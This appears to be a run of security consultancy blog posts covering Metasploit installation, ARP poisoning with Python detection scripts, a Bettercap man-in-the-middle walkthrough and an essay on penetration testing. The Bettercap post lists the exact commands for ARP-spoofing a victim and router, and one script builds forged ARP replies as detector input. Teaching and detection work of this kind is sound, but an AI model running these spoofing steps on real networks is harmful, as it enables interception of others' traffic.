  • After the installation finishes, open a terminal window and type the below to start msfconsole:

    $ ./msfconsole

  • The prompt asks whether you want to set up a new database. Type y or yes to run the initial configuration script to create the initial database.

  • If all goes well, the console begins and shows the following:

    Creating database at /Users/joesmith/.msf4/db
    Starting Postgresql
    Creating database users
    Creating initial database schema
    ** Metasploit Framework Initial Setup Complete **
    [*] Starting the Metasploit Framework console...-[*] The initial module cache will be built in the background, this can take 2-5 minutes...
    /
    Metasploit Park, System Security Interface
    Version 4.0.5, Alpha E
    Ready...
    > access security
    access: PERMISSION DENIED.
    > access main security grid
    access: PERMISSION DENIED....and...
    YOU DIDN'T SAY THE MAGIC WORD!
    YOU DIDN'T SAY THE MAGIC WORD!
    =[ metasploit v4.11.0-dev [core:4.11.0.pre.dev api:1.0.0]]
    + -- --=[ 1454 exploits - 827 auxiliary - 229 post ]
    + -- --=[ 376 payloads - 37 encoders - 8 nops ]
    + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
    msf >

  • To check that the database was built, run the following command:

    $ db_status

  • If the Metasploit Framework is successfully connected to the database, the following status is displayed:

    [*] postgresql connected to msf

How to install the Metasploit framework on OSX?

  • Download the OSX package.
  • After you download the package, locate the file and double-click the installer icon to start the installation process.
  • When the Welcome screen appears, select Continue.
  • Read the license agreement and select Continue.
  • Agree to the license agreement to continue with the installation process.
  • Browse to the location where you want to install the Metasploit Framework if you need to change the default installation location.
  • Select Install when you are ready to install the Metasploit Framework.
  • The installation process can take 5-10 minutes to complete.
  • When the installation completes, select the Close button.
  • To initialize and start the database, run the following command:

    $ msfdb init

If you have any doubts about this topic, or need advice and the best services and consultation about the Metasploit Framework, feel free to contact us. AIRZERO SEC will be your strong digital solution. Email id: [email protected]

Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile: www.linkedin.com/in/johnsontaugustine/


Address Resolution Protocol (ARP) poisoning is an attack that involves sending spoofed ARP messages over a local area network. It's also known as ARP spoofing, ARP poison routing and ARP cache poisoning. These attacks attempt to redirect traffic from its originally intended host to an attacker instead. ARP poisoning does this by associating the attacker's Media Access Control (MAC) address with the IP address of the target. It only works against networks that use ARP.

ARP poisoning is a kind of man-in-the-middle attack that can be used to stop network traffic, modify it, or intercept it. The technique is often used to launch further attacks, such as session hijacking or denial-of-service. Before you can understand what ARP poisoning is, it's essential to have solid knowledge of the ARP protocol. Before we can talk about the ARP protocol, we need to back up a little further and discuss the Internet protocol suite.

What is the internet protocol suite?

When you open the web browser on your phone, the memes and cat photos are delivered to you almost immediately and with little effort, making the process seem simple.

It can appear as if your phone and the server that hosts the cat pictures are connected like two cups on a string, and that, like two children playing telephone, the cat photo just travels along some wires and appears on your phone like the sound of a voice over the string. Given the prevalence of wifi and mobile data these days, it may even seem like the cat picture somehow moves across the ether.

Of course, this isn't the case. The cat picture's journey is actually pretty complex, travelling across a multi-layered system that is best approximated with the Internet protocol suite model:

  • The application layer:
    At the application layer, neither you, your web browser nor the server software are very aware of how the cat picture got delivered to you. You don't know how many routers the data for the cat picture went through, or whether it travelled over wireless connections. All you know is that you clicked on a link and the cat picture came to you.
  • The transport layer:
    With the transport layer, we get under the hood a little bit. The transport layer is responsible for establishing a connection between the client and the server that hosts the website. The transport layer keeps an eye on the connection and looks for errors, but it doesn't care about how the data is moved between the client and the server.
  • The internet layer:
    Internet layer software is responsible for moving data between networks. It doesn't care about the cat picture's data and handles it the same as it would handle data for an ebook about chemistry. Once the internet layer software gets the cat picture data to your local network, it hands it off to the link-layer software.
  • The link layer:
    Link layer software moves both incoming and outgoing data within your local network. It takes the data for the cat picture from the internet layer software and delivers it to your device.

Each of the layers can have a number of different protocols running to complete its job. This collection of systems somehow runs cohesively to bring the cat picture from the server to your phone's screen.

What is the address resolution protocol?

The address resolution protocol (ARP) is just one of these protocols. It's used to determine which link-layer address, such as a MAC address, corresponds to a given internet layer address for a physical machine. These are usually IPv4 addresses.

Since IPv4 is still the most commonly used internet protocol, ARP usually bridges the gap between 32-bit IPv4 addresses and 48-bit MAC addresses. It works in both directions.

The association between a given MAC address and its IP address is stored in a table known as the ARP cache. When a packet heading towards a host on a LAN reaches the gateway, the gateway uses ARP to associate the MAC or physical host address with its corresponding IP address.

The host then searches its ARP cache. If it finds the corresponding address, the address is used to convert the format and packet length. If the right address isn't found, ARP sends out a request packet that asks the other machines on the local network whether they know the correct address. If a machine replies with the address, the ARP cache is updated in case there are any future requests from the same source.

What is ARP spoofing?

Now that you understand more about the underlying protocol, we can cover ARP poisoning in more depth. The ARP protocol was designed to be efficient, which led to a serious lack of security in its design. This makes it relatively easy for someone to mount these attacks, as long as they can reach the local network of their target. ARP poisoning involves sending forged ARP reply packets to a gateway over the local network. Attackers typically use spoofing tools like Arpspoof or Arppoison to make the task easier. They set the IP address of the tool to match the address of their target. The tool then scans the target LAN for the IP and MAC addresses of its hosts. Once the attacker has the addresses of the hosts, they start sending forged ARP packets over the local network to the hosts. The fraudulent messages tell the recipients that the attacker's MAC address should be associated with the IP address of the machine they are targeting.

This results in the recipients updating their ARP cache with the attacker's address. When the recipients communicate with the target in the future, their messages will actually be sent to the attacker instead.

At this point, the attacker is secretly in the middle of the communications and can leverage this position to read the traffic and steal data. The attacker can also alter data before it reaches the target, or even stop the communications completely.
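What the forged replies look like on the wire, and how a host or a monitor can notice them, as an added example that is not part of the original post. It parses Ethernet/IPv4 ARP frames and keeps a small IP-to-MAC cache in the manner of arpwatch, raising an alert when a packet claims an IP that is already bound to a different MAC. The frames and all addresses are constructed; the gateway values echo the `arp -a` sample shown later on the page.

```python
"""Parse ARP frames and flag the trace poisoning leaves on the wire: a packet
whose sender claims an IP that is already bound to a different MAC.

Added example (a tiny arpwatch), not from the original post. All frames and
addresses below are constructed."""
import struct

ETHERTYPE_ARP = 0x0806
OP_REQUEST, OP_REPLY = 1, 2
BROADCAST = "ff:ff:ff:ff:ff:ff"


def mac_bytes(s):
    return bytes(int(x, 16) for x in s.split(":"))


def ip_bytes(s):
    return bytes(int(x) for x in s.split("."))


def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)


def ip_str(b):
    return ".".join(str(x) for x in b)


def make_frame(op, sender_mac, sender_ip, target_mac, target_ip):
    """Build an Ethernet II + ARP frame; used here only to construct sample input."""
    eth_dst = BROADCAST if op == OP_REQUEST else target_mac
    eth = struct.pack("!6s6sH", mac_bytes(eth_dst), mac_bytes(sender_mac), ETHERTYPE_ARP)
    # hardware type 1 (Ethernet), protocol 0x0800 (IPv4), 6-byte MACs, 4-byte IPs
    arp = struct.pack("!HHBBH6s4s6s4s", 1, 0x0800, 6, 4, op,
                      mac_bytes(sender_mac), ip_bytes(sender_ip),
                      mac_bytes(target_mac), ip_bytes(target_ip))
    return eth + arp


def parse_arp(frame):
    """Return the ARP fields of an Ethernet/IPv4 ARP frame, or None if it is not one."""
    if len(frame) < 42:
        return None
    _dst, _src, ethertype = struct.unpack("!6s6sH", frame[:14])
    if ethertype != ETHERTYPE_ARP:
        return None
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None               # only Ethernet/IPv4 ARP is handled here
    sha, spa, tha, tpa = struct.unpack("!6s4s6s4s", frame[22:42])
    return {"op": op, "sender_mac": mac_str(sha), "sender_ip": ip_str(spa),
            "target_mac": mac_str(tha), "target_ip": ip_str(tpa)}


class ArpWatch:
    """Learn IP -> MAC bindings from every ARP packet seen and report changes."""

    def __init__(self):
        self.cache = {}           # ip -> mac, as a host's ARP cache would learn it
        self.alerts = []

    def observe(self, frame):
        pkt = parse_arp(frame)
        if pkt is None:
            return None
        ip, mac = pkt["sender_ip"], pkt["sender_mac"]
        known = self.cache.get(ip)
        if known is not None and known != mac:
            kind = "reply" if pkt["op"] == OP_REPLY else "request"
            self.alerts.append(f"{ip} moved from {known} to {mac} (ARP {kind})")
        self.cache[ip] = mac      # a real cache overwrites too; that is the weakness
        return pkt


def demo():
    """Gateway and a client talk normally, then a third MAC claims the gateway's IP."""
    gw_mac, gw_ip = "00:17:31:dc:39:ab", "192.168.0.1"
    pc_mac, pc_ip = "40:d4:48:ce:29:b2", "192.168.0.105"
    rogue_mac = "aa:bb:cc:dd:ee:ff"           # constructed attacker MAC
    w = ArpWatch()
    w.observe(make_frame(OP_REQUEST, gw_mac, gw_ip, "00:00:00:00:00:00", pc_ip))
    w.observe(make_frame(OP_REPLY, pc_mac, pc_ip, gw_mac, gw_ip))
    w.observe(make_frame(OP_REPLY, rogue_mac, gw_ip, pc_mac, pc_ip))   # the poison
    return w


if __name__ == "__main__":
    for alert in demo().alerts:
        print("ALERT:", alert)
```

Note that the monitor learns bindings from requests as well as replies, because both carry a sender MAC/IP pair and a poisoned cache can be seeded by either; it also overwrites the binding just as a real ARP cache does, which is precisely why the change must be logged at the moment it happens.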

How to detect ARP spoofing?

ARP poisoning can be detected in several different ways. You can use Windows' Command Prompt, an open-source packet analyzer such as Wireshark, or proprietary options such as XArp.

Command prompt

If you suspect you may be suffering an ARP poisoning attack, you can check in Command Prompt. First, open Command Prompt as an administrator. The easiest way is to press the Windows key to open the start menu. Type "cmd", then press Ctrl, Shift and Enter at the same time. This brings up Command Prompt, although you may have to click Yes to give the app permission to make changes. In the command line, enter:

arp -a

The table shows the IP addresses in the left column and MAC addresses in the middle. If the table contains two different IP addresses that share the same MAC address, then you are probably undergoing an ARP poisoning attack.

As an example, let's say that your ARP table contains a number of different addresses. When you scan through it, you may notice that two of the IP addresses have the same physical address. You might see something like this in your ARP table if you are really being attacked:

Internet Address      Physical Address
192.168.0.1           00-17-31-dc-39-ab
192.168.0.105         40-d4-48-cr-29-b2
192.168.0.106         00-17-31-dc-39-ab

As you can see, the first and the third MAC addresses match. This means that the owner of the 192.168.0.106 IP address is most likely the attacker.
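The same check done programmatically, as an added example that is not part of the original post: it parses the text of `arp -a` and reports any unicast MAC bound to more than one IP, then names the addresses that share the gateway's MAC. The table below is constructed to mirror the page's sample, with the broadcast and multicast rows a real Windows table also carries, since those legitimately repeat a MAC and must not be reported.

```python
"""Parse `arp -a` output and report MAC addresses bound to more than one IP.

Added example, not from the original post. The table is constructed to mirror
the page's sample plus the broadcast/multicast rows a real table contains."""
import re
from collections import defaultdict

# One `arp -a` row: IP, MAC (dash- or colon-separated), entry type.
ROW_RE = re.compile(
    r"^\s*(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+"
    r"(?P<mac>(?:[0-9a-f]{2}[-:]){5}[0-9a-f]{2})\s+(?P<type>\w+)", re.I)

SAMPLE_ARP_A = """\
Interface: 192.168.0.105 --- 0xb
  Internet Address      Physical Address      Type
  192.168.0.1           00-17-31-dc-39-ab     dynamic
  192.168.0.106         00-17-31-dc-39-ab     dynamic
  192.168.0.110         5c-ea-1d-1f-2a-3b     dynamic
  192.168.0.255         ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
  239.255.255.250       01-00-5e-7f-ff-fa     static
"""


def parse_arp_table(text):
    """Return [(ip, mac, type)] with MACs normalised to lower-case dashes."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if m:
            rows.append((m["ip"], m["mac"].lower().replace(":", "-"), m["type"].lower()))
    return rows


def is_group_address(mac):
    # Broadcast and IPv4 multicast rows legitimately share MACs; skip them.
    return mac == "ff-ff-ff-ff-ff-ff" or mac.startswith("01-00-5e-")


def duplicate_macs(rows):
    """{mac: [ip, ...]} for every unicast MAC that appears under two or more IPs."""
    by_mac = defaultdict(list)
    for ip, mac, _ in rows:
        if not is_group_address(mac):
            by_mac[mac].append(ip)
    return {mac: ips for mac, ips in by_mac.items() if len(ips) > 1}


def suspects_for_gateway(rows, gateway_ip):
    """IPs that share the gateway's MAC: the likely source of the forged replies."""
    mac_of = {ip: mac for ip, mac, _ in rows}
    gw_mac = mac_of.get(gateway_ip)
    return [ip for ip, mac in mac_of.items() if mac == gw_mac and ip != gateway_ip]


if __name__ == "__main__":
    rows = parse_arp_table(SAMPLE_ARP_A)
    for mac, ips in duplicate_macs(rows).items():
        print(f"{mac} is claimed by {', '.join(ips)}")
    print("suspects:", suspects_for_gateway(rows, "192.168.0.1"))
```

A duplicate is a strong hint rather than proof: a router with several VLAN interfaces or a virtualisation host can legitimately answer for more than one IP, so the result should be compared against what the network administrator knows the gateway's real MAC to be.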

How to prevent ARP spoofing?

You can use several methods to prevent ARP poisoning, each with its own positives and negatives. These include static ARP entries, encryption, VPNs and packet filtering.

Static ARP entries

This solution involves a lot of administrative overhead and is only recommended for smaller networks. It requires adding an ARP entry for every machine on the network into each individual computer.

Mapping the machines with sets of static IP and MAC addresses helps to prevent spoofing attacks because the machines can ignore ARP replies. Unfortunately, this solution can only protect you from simpler attacks.

Encryption

Protocols such as HTTPS and SSH can also help to reduce the chances of a successful ARP poisoning attack. When traffic is encrypted, the attacker would have to take the additional step of tricking the target's browser into accepting an illegitimate certificate. However, any data transmitted outside of these protocols will still be exposed.

VPNs

VPNs can be a reasonable defence for individuals, but they are generally not suitable for larger organizations. If it is just a single person making a potentially dangerous connection, such as using public wifi at an airport, then a VPN encrypts all of the data that travels between the client and the exit server. This helps to keep them safe because an attacker will only be able to see the ciphertext.

It's a less feasible solution at the organizational level because VPN connections would need to be in place between each computer and each server. Not only would this be complex to set up and maintain, but encrypting and decrypting on that scale would also hinder the network's performance.

Packet filters

These filters inspect each packet that is sent across a network. They can filter out and block malicious packets, as well as those whose IP addresses are suspicious. Packet filters can also tell if a packet claims to come from an internal network when it actually originates externally, helping to reduce the chances of an attack being successful.

How to protect the network from ARP spoofing?

If you want your network to be protected from the threat of ARP poisoning, the best plan is a combination of the prevention and detection tools mentioned above. The prevention methods tend to have flaws in certain situations, so even the most secure environment may find itself under attack.

If active detection tools are in place as well, then you will know about ARP poisoning as soon as it begins. As long as your network administrator is quick to act once alerted, you can generally shut down these attacks before much damage is done.

If you have any doubts about this topic, or need advice and the best services and consultation against ARP spoofing, feel free to contact us. AIRZERO SEC will be your strong digital solution. Email id: [email protected]

Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile: www.linkedin.com/in/johnsontaugustine/


What is Man In The Middle Attack(MITM)?

A man-in-the-middle attack is an attack where the attacker secretly relays and possibly alters the communications between two machines that believe they are directly connected to each other. In order to perform a man-in-the-middle attack, we need to be on the same network as our victim because we have to fool these two machines.

How to initiate the attack by running Bettercap?

To find out which network interface is in use, we can simply type ifconfig.

In this case it is wlan0, so just type bettercap -iface wlan0 and press enter.

As you can see, we are now inside the tool, but it's just a blank screen without any details. To make our work easier, we can type help and press enter; here is what it shows us.

Now we have some details, but our concern here is the modules. For more details, we can type help followed by a module's name, for example help net.probe.

This module has various parameters, but for now let's keep the defaults and turn on the module by typing net.probe on.

Now the module is running. What actually happens is that the module scans all the machines connected to the same network as our PC and lists their IP address, MAC address and vendor name. To make things clearer we can type net.show for further details.

So, a Raspberry Pi is the machine used to perform this attack and my IP address is 192.168.1.4. The router IP address is 192.168.1.1; we know this from the Name column, which shows the gateway, and the rest are the clients connected to this network. Now we can choose which one will be our victim.

Just like the previous module, it has various parameters. First, let's take a look at the arp.spoof.fullduplex parameter. In order to be the man in the middle, we need to fool both the victim and the router by telling the router that the victim's MAC address is our MAC address and telling the victim that the router's MAC address is our MAC address. So we need to set this parameter to true by typing set arp.spoof.fullduplex true. Secondly, we need to set the arp.spoof.targets parameter by simply giving it the IP address of our victim. So in my case it will be set arp.spoof.targets 192.168.1.3.

After setting up these 2 parameters we are ready to fire up this module by typing arp.spoof on. But wait a second; let's first go to Windows 10 and type arp -a.

As we already know from the net.show command, my router's IP is 192.168.1.1 and its MAC is e4:::::e4, which is the real one. So nothing bad has happened yet. Let's go back to the Raspberry Pi and fire up arp.spoof by typing arp.spoof on.

Now we are in the middle between the victim, which is Windows 10, and my router. To make sure, let's open up cmd on Windows 10 and type arp -a. Then I'll move over to Windows 10. Nothing looks wrong in the browser; everything seems just fine. Yeah! Yet we know that our victim is accessing vulnweb.com.

If you have any doubts about this topic, or need advice and the best cybersecurity services and consultation about man-in-the-middle attacks, feel free to contact us. AIR ZERO SEC will be your strong digital solution. Email id: [email protected]

Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile: www.linkedin.com/in/johnsontaugustine/


What is penetration testing?

Penetration testing is the formal process of assessing the maturity and strength of the security systems in place. Regular penetration testing helps businesses find emerging security threats and vulnerabilities, gain critical insight into the exploitability of security vulnerabilities, and assess the security problems facing them.

By mimicking real-life attack scenarios under safe conditions, web application penetration testing and other types of pen-testing are helpful, not dangerous, processes. Pen-testing empowers businesses to gain the first-mover advantage in terms of security.

Conducted by trustworthy and certified security experts, pen-testing is a well-planned process. It is done after obtaining all necessary permissions from the business and without interrupting the normal flow of work.

What is ethical hacking?

Ethical hacking is a wide, umbrella term that includes all hacking and cyberattack methodologies. These are longer-term assessments conducted by the ethical hacker, with the necessary permissions, to explore the IT architecture more broadly. Ethical hacking helps unearth security vulnerabilities and flaws by intruding into the system using a wide range of attack vectors and attack kinds. The professionals conducting ethical hacking must be distinguished from black-hat hackers, who have malicious intent. Ethical hackers, with their understanding of the system, will not just locate weaknesses but also research and suggest security-related methodologies to implement.

What is the difference between ethical hacking and penetration testing?

  • Purpose
    Penetration testing seeks to find security weaknesses in the targeted system. It is usually not conducted on the entire infrastructure. It seeks to tell the company how its security systems respond to real-time attacks and suggest measures to strengthen them. Ethical hacking seeks to find as many security flaws as possible in the information technology environment using wide-ranging plans and attack vectors. It seeks to give a holistic evaluation of cybersecurity. More problem-solving and risk mitigation assistance is provided by ethical hackers, in comparison to penetration testers, who submit a report with suggestions at the end of the testing.
  • Scope
    Given budget constraints, penetration testing is often performed on specific parts of the IT system defined for testing, not the complete environment. The assessment provided by penetration testing is targeted and point-in-time. As a result, security flaws and weaknesses are identified only in the targeted systems at a given point in time. Ethical hacking has a wider scope and assesses the IT environment holistically over longer periods of time. So there is scope to find as many security flaws and weaknesses as possible in the environment. Penetration testing is a function of ethical hacking.
  • Permissions Required
    Since web application penetration testing and other types of pen-testing are targeted, the testers require access and permissions only for those targeted areas they are testing. In ethical hacking, the tester needs access and permissions to a whole range of systems and locations, based on the defined scope.

Who Conducts penetration testing and ethical hacking?

This is one of the important points of difference between penetration testing and ethical hacking.

  • Penetration testing can be done by someone with knowledge and expertise in the specific area of testing. Ethical hackers must have knowledge of software, programming languages and hardware to be effective.
  • Knowledge of hacking methodologies in the targeted areas is adequate for penetration testers, while ethical hackers must have a wider knowledge of attack methodologies and attack vectors.
  • While reporting is necessary for penetration testing, ethical hackers must be experts in report writing and be able to produce in-depth reports with recommended solutions.
  • Ethical hackers must be certified. Even though it is recommended to have certification, it is not that important for penetration testers if they have enough experience.
  • It is believed that the best penetration testers have ethical hacking knowledge, as it better equips them to conduct effective tests and produce detailed reports and actionable insights.

Ethical hacking or Penetration testing which is the best?

Overall, penetration testing can be argued to be a subset of ethical hacking. Ethical hacking, at its extreme, can be a process of hacking the system just as a hacker would, but with full permission from the business and stakeholders to do so.

Penetration testing focuses on identifying problems. Ethical hacking aims not just to identify risk but also to show and demonstrate exploitation.

Not all organizations can set up systems where exploitation can be carried out, and hence penetration testing, which gives a view and an understanding of the exploitable risks without the damage of actual exploitation, is an effective way to gain visibility and fix them.

If you have any doubts about this topic, or need the best penetration testing and ethical hacking services, feel free to contact us. AIRZERO SEC will be your digital partner. Email id: [email protected]

Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile: www.linkedin.com/in/johnsontaugustine/